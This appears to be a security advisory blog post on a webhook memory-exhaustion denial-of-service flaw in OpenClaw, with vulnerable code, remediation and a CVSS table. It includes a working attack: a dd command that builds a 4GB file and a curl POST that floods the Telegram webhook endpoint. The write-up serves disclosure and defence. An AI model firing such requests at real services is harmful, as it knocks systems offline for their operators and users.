Feb 18, 2026·5 min read·5 visits
OpenClaw listens for webhooks but doesn't check how big the message is before trying to memorize it. Attackers can send a 5GB 'hello' message, causing the server to eat all available RAM and crash (OOM).
OpenClaw (formerly ClawdBot) suffers from a critical Denial of Service vulnerability due to improper handling of incoming webhook requests. The application buffers the entire request body into memory without enforcing size limits or checking the `Content-Length` header. This architectural oversight allows an unauthenticated attacker to send a single, massive HTTP request—potentially gigabytes in size—forcing the Node.js process to allocate memory until it hits the V8 heap limit or triggers the OS Out-Of-Memory (OOM) killer, crashing the service instantly.
In the rush to deploy AI agents that can talk to Telegram, Slack, and Discord simultaneously, developers often forget the cardinal rule of web services: Never trust the client.
OpenClaw (previously ClawdBot, currently Moltbot) is a popular framework for spinning up these omni-channel bots. To function, it exposes public webhook endpoints. These endpoints are the ears of the bot, waiting for a ping from Telegram saying, "Hey, user X just sent a message."
But here's the catch: To be useful, these endpoints must be publicly accessible to the internet. You can't firewall them off if you want Telegram to reach you. This exposes the application's intake mechanism to the entire world. And in OpenClaw's case, the intake mechanism had the appetite of a black hole and the stomach capacity of a thimble.
The vulnerability (GHSA-q447-rj3r-2cgh) is a textbook case of Uncontrolled Resource Consumption (CWE-400). In a healthy web application, when a request comes in, the server checks the Content-Length header. If someone tries to upload a terabyte of data to a text-only endpoint, the server should laugh and sever the connection immediately (HTTP 413 Payload Too Large).
OpenClaw didn't do this. Instead, it adopted what I like to call the "Slurp and Burp" strategy.
When a request arrived at the media or webhook endpoints, the application logic instructed the Node.js process to start buffering the incoming data stream into RAM. It didn't ask "how big is this?" It just started eating.
Complicating matters, the context indicates the application was performing Base64 decoding on media payloads in memory. Base64 encoding adds roughly 33% overhead to binary data. So, if an attacker sends a large payload, the server isn't just storing the payload; it's allocating new buffers to decode it, effectively doubling down on memory usage until the V8 garbage collector waves a white flag.
While the exact source code isn't public in the snippet, we can reconstruct the vulnerability based on the patch analysis. The vulnerable pattern in Node.js typically looks like this:
// THE VULNERABLE WAY
app.post('/api/webhooks/telegram', (req, res) => {
let data = [];
// 1. Event listener fires for every chunk of data received
req.on('data', (chunk) => {
// 2. BLINDLY push chunks to memory.
// No check for if (data.length > MAX_LIMIT)
data.push(chunk);
});
req.on('end', () => {
// 3. Concatenate and explode
const buffer = Buffer.concat(data);
processWebhook(buffer);
});
});This code is a death sentence in production. Node.js streams are powerful because they allow processing data as it flows. By manually collecting chunks into an array without a limiter, the developer turned a streaming platform into a bucket.
If you send a 10GB stream:
HEAP_OUT_OF_MEMORY.Exploiting this does not require advanced reverse engineering, shellcode, or complex gadget chains. It requires curl and a large file. This is the script-kiddie equivalent of a nuclear option.
First, we generate a massive garbage file. We don't even need real JSON; we just need bytes to fill the pipe.
# Generate a 4GB file of zeros
dd if=/dev/zero of=death_packet.bin bs=1G count=4Next, we direct this firehose at the target. Since OpenClaw is listening for webhooks, we target the /api/webhooks/generic or /api/webhooks/telegram endpoint.
curl -v -X POST http://target-openclaw:3000/api/webhooks/telegram \
-H "Content-Type: application/json" \
--data-binary @death_packet.binThe Server Side View:
Out of memory: Killed process 123 (node).The fix for this is two-fold: Application-level constraints and Infrastructure-level gating. You never want your application to be the first line of defense against a volumetric attack, but it shouldn't be defenseless either.
1. The Code Fix (Application Level)
The patched version (2026.1.24-4) implements body size limits. If you are using body-parser or similar middleware in Express/Node, it looks like this:
// THE FIX
app.use(express.json({ limit: '10mb' }));
app.use(express.urlencoded({ limit: '10mb', extended: true }));For raw streams, you must check the chunk length as it arrives and destroy the socket if it exceeds your tolerance.
2. The Infrastructure Fix (The Real Shield) Do not expose Node.js directly to the internet. Put Nginx, HAProxy, or a Cloud WAF in front of it. Nginx is incredibly efficient at dropping oversized requests before they ever touch your expensive application memory.
# nginx.conf
server {
...
# Drop anything larger than 10MB
client_max_body_size 10M;
...
}This turns a 5GB crash attempt into a harmless 413 Request Entity Too Large error log.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
clawdbot OpenClaw | <= 2026.1.24-3 | 2026.1.24-4 |
| Attribute | Detail |
|---|---|
| Vulnerability ID | GHSA-q447-rj3r-2cgh |
| CWE | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS | 7.5 (High) |
| Attack Vector | Network (Unauthenticated) |
| Impact | Denial of Service (DoS) |
| Fix Version | 2026.1.24-4 |
The software does not properly control the allocation and maintenance of a limited resource thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.